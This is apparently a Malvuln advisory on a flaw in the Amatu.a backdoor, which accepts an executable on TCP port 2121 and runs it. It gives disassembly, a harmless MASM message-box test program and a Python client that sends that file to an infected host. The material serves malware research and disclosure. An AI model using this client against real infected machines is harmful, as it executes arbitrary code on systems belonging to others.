Backdoor.Win32.Amatu.a MVID-2024-0698 Arbitrary File Write

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/1e2d0b90ffc23e00b743c41064bdcc6b.txtContact: [email protected]: x.com/malvuln  Threat: Backdoor.Win32.Amatu.aVulnerability: Remote Arbitrary File Write (RCE)Family: AmatuType: PE32MD5: 1e2d0b90ffc23e00b743c41064bdcc6bSHA256: 77fff9931013ab4de6d4be66ca4fda47be37b6f706a7062430ee8133c7521297Vuln ID: MVID-2024-0698Dropped files: mine.exeDisclosure: 09/27/2024Description: The malware listens on TCP port 2121. Third-party adversaries who can reach an infected host, can write arbitrary executable code to a file named "mine.exe" to SysWOW64 directory. The mine.exe  PE file executes immediately and runs as a child of the parent process malware. Amatu calls several Win32 APIs "GetSystemDirectoryA", "CreateFileA" and "WriteFile" to save the inbound code to disk. Finally, it calls "ShellExecuteA" executing the arbitrary PE file sent by the attacker. Setup a gateway and fake DNS sinkhole to mimic outbound internet access for the C2 or the port may not open."Amatu.a" disassemblycall    ds:GetSystemDirectoryA004A1FCB                 lea     ecx, [ebp+Source]004A1FD1                 push    ecx             ; Source004A1FD2                 lea     edx, [ebp+Buffer]004A1FD8                 push    edx             ; Destination004A1FD9                 call    strcat004A1FDE                 add     esp, 8004A1FE1                 push    offset aMine    ; "mine"004A1FE6                 lea     eax, [ebp+Buffer]004A1FEC                 push    eax             ; Destination004A1FED                 call    strcat004A1FF2                 add     esp, 8004A1FF5                 push    offset aExe     ; ".exe"004A1FFA                 lea     ecx, [ebp+Buffer]004A2000                 push    ecx             ; Destination004A2001                 call    strcat004A2022                 call    ds:CreateFileA 004A206B                 call    recv.004A2070                 mov     [ebp+nNumberOfBytesToWrite], eax.004A2076                 cmp     [ebp+nNumberOfBytesToWrite], 0push    eax             ; lpNumberOfBytesWritten004A209C                 mov     ecx, [ebp+nNumberOfBytesToWrite]004A20A2                 push    ecx             ; nNumberOfBytesToWrite004A20A3                 lea     edx, [ebp+buf]004A20A9                 push    edx             ; lpBuffer004A20AA                 mov     eax, [ebp+hFile]004A20B0                 push    eax             ; hFile004A20B1                 call    ds:WriteFilemov     ecx, [ebp+hFile]004A20BF                 push    ecx             ; hObject004A20C0                 call    ds:CloseHandle004A20C6                 push    1               ; nShowCmd004A20C8                 push    0               ; lpDirectory004A20CA                 push    0               ; lpParameters004A20CC                 lea     edx, [ebp+Buffer]004A20D2                 push    edx             ; lpFile004A20D3                 push    offset Operation ; "open"004A20D8                 push    0               ; hwnd004A20DA                 call    ds:ShellExecuteA004A20E0                 mov     eax, [ebp+s]004A20E3                 push    eax             ; s004A20E4                 call    closesocketExploit/PoC:1) Create a small PE file named "mine.exe", I used MASM and packed it with FSG."mine.exe" include \masm32\include\masm32rt.inc.dataHATE db "Masm32:", 0MyReal8 REAL8 123.456.data?aDword dd ?.codestart:  invoke MessageBox, 0, chr$("DOOM!"), addr HATE, MB_OK  mov eax, 123  exitend start2) Our custom client to send "mine.exe" to the remote infected host.from socket import *MALWARE_HOST="x.x.x.x"PORT=2121DOOM="mine.exe" def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).